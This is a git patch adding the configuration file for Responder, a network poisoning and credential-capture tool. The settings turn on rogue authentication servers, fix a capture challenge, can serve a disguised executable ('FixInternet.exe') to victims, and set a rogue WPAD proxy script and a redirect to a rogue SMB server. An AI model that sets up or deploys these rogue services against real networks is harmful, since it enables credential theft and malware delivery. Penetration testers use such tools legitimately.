From d57310273df524b99d17c97b49ee35eb3aec7b52 Mon Sep 17 00:00:00 2001 From: lgandx Date: Fri, 8 Nov 2013 21:07:42 -0500 Subject: [PATCH] Added: Configuration file for Responder --- Responder.conf | 50 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 Responder.conf diff --git a/Responder.conf b/Responder.conf new file mode 100644 index 0000000..e2a5f89 --- /dev/null +++ b/Responder.conf @@ -0,0 +1,50 @@ +[Responder Core] +;; +;Set these values to On or Off, so you can control which rogue authentication server is turned on. +SQL = On +SMB = On +FTP = On +HTTP = On +HTTPS = On +DNS = On +LDAP = On +; +;Set a custom challenge +Challenge = 1122334455667788 +; +;Set an IP address if you want to bind responder to a specific interface. +;Default is 0.0.0.0, which means Responder will listen on all interfaces. +Bind_to = 0.0.0.0 +; +;Set this to change the default logging file +SessionLog = Responder-Session.log +; +[HTTP Server] +;; +;Set this to On if you want to always serve a specific file to the victim. +Serve-Always = Off +; +;Set this to On if you want to serve an executable file each time a .exe is detected in an URL. +Serve-Exe = Off +; +;Uncomment and specify a custom file to serve, the file must exist. +Filename = FixInternet.exe +; +;Specify a custom executable file to serve, the file must exist. +ExecFilename = FixInternet.exe +; +;Set your custom PAC script +WPADScript = function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';} +; +;HTML answer to serve after user authentication. +;In this example, we redirect the browser to our rogue SMB server. +HTMLToServe = Loading +; +[HTTPS Server] +; +;Change to use your certs +cert = Certs/responder.crt +key = Certs/responder.key +; + +